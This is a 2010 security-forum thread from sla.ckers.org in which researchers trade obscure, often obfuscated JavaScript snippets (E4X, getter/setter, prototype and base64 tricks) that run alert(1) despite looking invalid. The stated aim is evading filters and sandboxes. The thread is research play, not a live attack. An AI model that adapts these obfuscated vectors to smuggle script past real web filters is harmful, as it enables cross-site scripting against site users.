Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: March 23, 2010 12:54PM

G'day all

Since there hasn't been too much activity on this board as well as on the whole forum recently - besides on SEO, SQL (<- Suuperboring! Reiners - really!!1 :P j/k) and the news section I thought why not create a new weird JS thread.

This thread's major topic - JavaScript from beyond - script that gets executed but definitely shouldn't for more or less obvious reasons.

So - here's a start - inspired by thornmaker on Twitter:

({0:#0=alert/#0#/#0#(0)}) //FF2+ - 3.7+



Edited 2 time(s). Last edit at 03/29/2010 08:27AM by .mario.

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 23, 2010 02:43PM

<{_=alert,'x'}></x>.*.who.knows.why.*.I.dunno(_(1))

<{_=alert,'x'}></x>.*.who.knows.why.*.I.dunno(_(1)).@yeah.*.it.can.keep.going

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/23/2010 02:51PM by Gareth Heyes.

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Reiners
Date: March 23, 2010 02:59PM

snitch :>

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 24, 2010 06:11AM

/[/gi;alert(2)+[1,2,3]//alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Anonymous User
Date: March 24, 2010 08:45AM

@Gareth Awesome ones! The E4X one is amazing!

This one has super powers *g*:

/.// /*////.// /./*//.//alert(1)//.//*

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 24, 2010 10:27AM

Nice, I can see a few JSReg bugs coming haha two already fail the comment stripping

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Anonymous User
Date: March 24, 2010 12:57PM

Thaaat.. should not work:

ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x

Or should it? :P

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Date: March 24, 2010 01:44PM

Here are others on the same theme:

SyntaxError.prototype.__defineGetter__('name', function() { alert(1) })
eval('====');

or

TypeError.prototype.__defineGetter__('name', function() { alert(1) })
length()

or

window.__defineSetter__('length',function(){alert(1)})
[].pop.call()

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 24, 2010 02:42PM

Object.prototype.__noSuchMethod__=Function;
01.&#8578;('alert("SLACKERS NEEDS UTF-8")')()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Anonymous User
Date: March 24, 2010 06:43PM

<script>
openDatabase(0,'1.'+0,0,0).transaction(function($){$.executeSql('\S\e\L\x65\103T~1`alert(1)`/**',/./,function(_,$){for(_ in $.rows.item(0))eval(_)})})
</script>

Chrome 4 & 5 - so says future man

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Date: March 25, 2010 08:57AM

Forget about it..

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 03/25/2010 09:01AM by Jonas Magazinius.

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 25, 2010 09:00AM

@Jonas

That is swwwwwwwwwwweeet haha expect this to be abused in the near future :)

Hmmmmmmmmmm doesn't work for me after trying

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/25/2010 09:03AM by Gareth Heyes.

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Date: March 25, 2010 09:10AM

_=/./,_['*']=alert,_.*.call(null,1)



''.__proto__.__proto__['*']=function(x){alert(x)},[].*(1)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 03/25/2010 09:27AM by Jonas Magazinius.

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Date: March 25, 2010 09:12AM

@Gareth - I was fooled by one of the nice SyntaxError.name tricks before. As soon as I refreshed the page it stopped working. Now it works though.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 03/25/2010 09:15AM by Jonas Magazinius.

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Date: March 25, 2010 12:58PM

Finally got it to run properly:

<{XML.prototype.function::['*']=function(){alert(1)},'x'}/>.*.function::*()

OR

<{XML.prototype.function::['*']=function(){alert(1)},'x'}/>.*['*']()

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Anonymous User
Date: March 25, 2010 05:53PM

Nice ones! More "joy of E4X"

<?_ @{}?>|<_{<?_?>}></_{alert(1)}>

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 26, 2010 03:52AM

mmmmmmmmmmmmmmmmm e4x ogogooghghhghiohgh



------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 29, 2010 04:25AM

.00000.*(<_{alert(1)}/>.*.*.*.*).*.*.*.*

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: satyr
Date: March 29, 2010 07:57AM

[{get:{set set set(set)set(set)}.set}]=[{get get get(get)alert}]

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 29, 2010 08:51AM

@satyr

Hahaha that's insane

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Anonymous User
Date: March 29, 2010 11:25AM

@satyr Nice indeed - you can even combine set and setter :D

({set/**/$($){_/**/setter=$,_=1}}).$=alert

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brend Eich knows - if at all...
Posted by: Gareth Heyes
Date: April 08, 2010 08:30AM

([º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ><µ>{(![]+[])[+!![]+!![]+[]]
}</µ><µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ><µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ></ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).@À.º.Æ.Å.Ç

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Date: April 10, 2010 08:17AM

Might have gone a little bit crazy with this one, but here goes.

<_ _={-~(_=([º]=[[]['sort']['call']()[(9*1e5*9+579600+28*30-1)[toString.name](2*3*5)]]))}>º(_)</_>.(_[+[]][atob('Y29uc3RydWN0b3I=')]('_',*)(@*)).*

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: April 18, 2010 10:58AM

0?<script>Worker("#").onmessage=function(_)eval(_.data)</script>:postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))

FF only (has to be saved in a HTML page to work) - E4X + Worker + expression closure + data URI + base64 + self inclusion :)



Edited 1 time(s). Last edit at 04/18/2010 11:30AM by .mario.

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: April 20, 2010 05:38PM

(String.__defineGetter__('va\lue'+[<{_=eval('(function(\_\){\x61lert\u00281)})'),'__'}>Of</{'__'}>], _)+'').constructor



Edited 1 time(s). Last edit at 04/20/2010 05:39PM by .mario.

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: June 04, 2010 08:04AM

Not much going on in here - so I give u this :)

a=a setter=alert

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Date: June 06, 2010 02:46PM

@mario - This one is just wonderful! How did you come up with it?

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: June 06, 2010 03:27PM

@Jonas accidentally as usual ;)

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Date: June 06, 2010 08:51PM

I agree with mario, it's been way to quiet here lately.


for(var _=alert in {get __iterator__()_(_)});


for(var _=alert in {get __iterator__()function($)({get next()function()_($)})});


Object.prototype.__defineSetter__('source',function(_)this(_));throw alert

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Gareth Heyes
Date: June 07, 2010 05:55AM

You think posting some crazy cool js is going to tempt people to post more???

window.function=function function(){return function function(){return function function(){}}()}()

It worked! :)

yosuke hasegawa followed up with:-
window=(function with(){return function while(){return function return(){alert(1)}}()}())();

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.